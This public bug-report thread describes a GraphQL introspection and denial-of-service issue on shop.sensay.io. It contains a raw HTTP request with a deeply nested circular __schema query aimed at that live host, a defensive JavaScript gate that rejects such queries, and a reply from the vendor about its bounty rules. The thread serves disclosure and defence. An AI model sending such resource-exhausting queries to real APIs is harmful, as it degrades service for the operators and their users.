GraphQL Introspection Allowed exposed
Karim Habeeb
Your web application's GraphQL API has been identified to allow nested queries with circular relationships through introspection. This configuration can lead to complex queries that consume an excessive amount of resources, potentially resulting in a Denial of Service (DoS) attack that reduces the availability of your GraphQL API and affects the overall performance of your web application.
POST /api/graphql HTTP/1.1
Content-Type: application/json
Accept: */*
Cookie: localization=GB; _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22DENW%22%2C%22reg%22%3A%22%22%2C%22purposes%22%3A%7B%22a%22%3Afalse%2C%22p%22%3Afalse%2C%22m%22%3Afalse%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Atrue%2C%22sale_of_data_region%22%3Afalse%2C%22consent_id%22%3A%220E1087C7-1c66-4699-b905-8523f4c07463%22%7D
Content-Length: 155
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Host: shop.sensay.io
Connection: Keep-alive
{"query":"query inv { __schema { types { fields { type { fields { type { fields { type { fields { type { name } } } } } } } } } } }","operationName":"inv"}
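A defender-side pre-parse gate for the class of query shown in the report above, added here as an example; it is not code from either poster or from the Sensay project. It assumes a Node.js service that can run a cheap check on the raw query text before handing it to the real GraphQL parser, and the policy values (`maxDepth: 6`, introspection disabled) are assumptions you would tune per API. The gate strips string literals and comments so braces inside them are not miscounted, estimates the nesting depth of selection sets, flags the `__schema` / `__type` introspection fields, and rejects the query when it exceeds policy. Input-object literals in arguments also use braces, so the depth figure is an upper bound, which errs on the side of rejecting.

```javascript
// Added example (not from the thread): a dependency-free pre-parse gate that
// estimates selection-set nesting and flags introspection fields, so that
// oversized or introspective queries are rejected before the real parser and
// resolvers spend resources on them. Policy values below are assumptions.

const POLICY = { maxDepth: 6, allowIntrospection: false };

// Remove string literals, block strings and comments so that braces inside
// them (e.g. search(term: "{{{")) are not mistaken for selection sets.
function stripStringsAndComments(query) {
  let out = '';
  for (let i = 0; i < query.length; i++) {
    const c = query[i];
    if (c === '#') {                        // line comment: skip to end of line
      while (i < query.length && query[i] !== '\n') i++;
      continue;
    }
    if (query.startsWith('"""', i)) {       // block string: skip to closing """
      const end = query.indexOf('"""', i + 3);
      i = end === -1 ? query.length : end + 2;
      out += '""';
      continue;
    }
    if (c === '"') {                        // ordinary string, honouring \" escapes
      i++;
      while (i < query.length && query[i] !== '"') {
        if (query[i] === '\\') i++;
        i++;
      }
      out += '""';
      continue;
    }
    out += c;
  }
  return out;
}

// Maximum brace nesting in the stripped query. Input-object literals in
// arguments also use braces, so this is an upper bound on selection-set
// depth; for a reject-if-too-deep gate that is the safe direction.
function selectionDepth(stripped) {
  let depth = 0;
  let max = 0;
  for (const c of stripped) {
    if (c === '{') max = Math.max(max, ++depth);
    else if (c === '}') depth = Math.max(0, depth - 1);
  }
  return max;
}

// Apply the policy and return a structured verdict the request handler can
// log and act on (reject with 400 and record the reason, for example).
function assessQuery(query, policy = POLICY) {
  const stripped = stripStringsAndComments(query);
  const depth = selectionDepth(stripped);
  const usesIntrospection = /\b__(schema|type)\b/.test(stripped);
  let reason = null;
  if (usesIntrospection && !policy.allowIntrospection) {
    reason = 'introspection is disabled';
  } else if (depth > policy.maxDepth) {
    reason = `selection depth ${depth} exceeds limit ${policy.maxDepth}`;
  }
  return { depth, usesIntrospection, allowed: reason === null, reason };
}

// The query body from the report above (depth 11 by this measure), and a
// constructed benign query whose argument braces and string must not inflate
// the count.
const REPORTED_QUERY =
  'query inv { __schema { types { fields { type { fields { type { fields { type { fields { type { name } } } } } } } } } } }';
const BENIGN_QUERY =
  '{ products(first: 5, filter: { tag: "{not a selection}" }) { name price } }';

if (typeof require !== 'undefined' && require.main === module) {
  for (const q of [REPORTED_QUERY, BENIGN_QUERY]) console.log(assessQuery(q));
}
```

Run the gate on the raw query string before parsing; a query that is rejected here never reaches the schema executor, so the nested circular traversal the report describes is cut off at its cheapest point. Leave introspection enabled only in non-production environments, and keep a server-side depth and complexity limit even then, since disabling introspection alone does not stop an attacker who already knows the schema.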
Ben Peeri
Hi Karim,
Thank you for taking the time to share this information regarding the GraphQL introspection and potential DoS risk.
Please note that public posts are not considered valid submissions under our security bounty process. To be eligible for bounty consideration and proper triage, all reports must be submitted privately and in accordance with our official guidelines.
You can find the full details on how to submit eligible findings — including report formatting, proof-of-concept expectations, and reward criteria — at the following link:
https://sensay.io/bug-bounty/terms/security-bounty-program
We appreciate your efforts in helping improve Sensay’s security posture and look forward to reviewing any future submissions that follow our program process.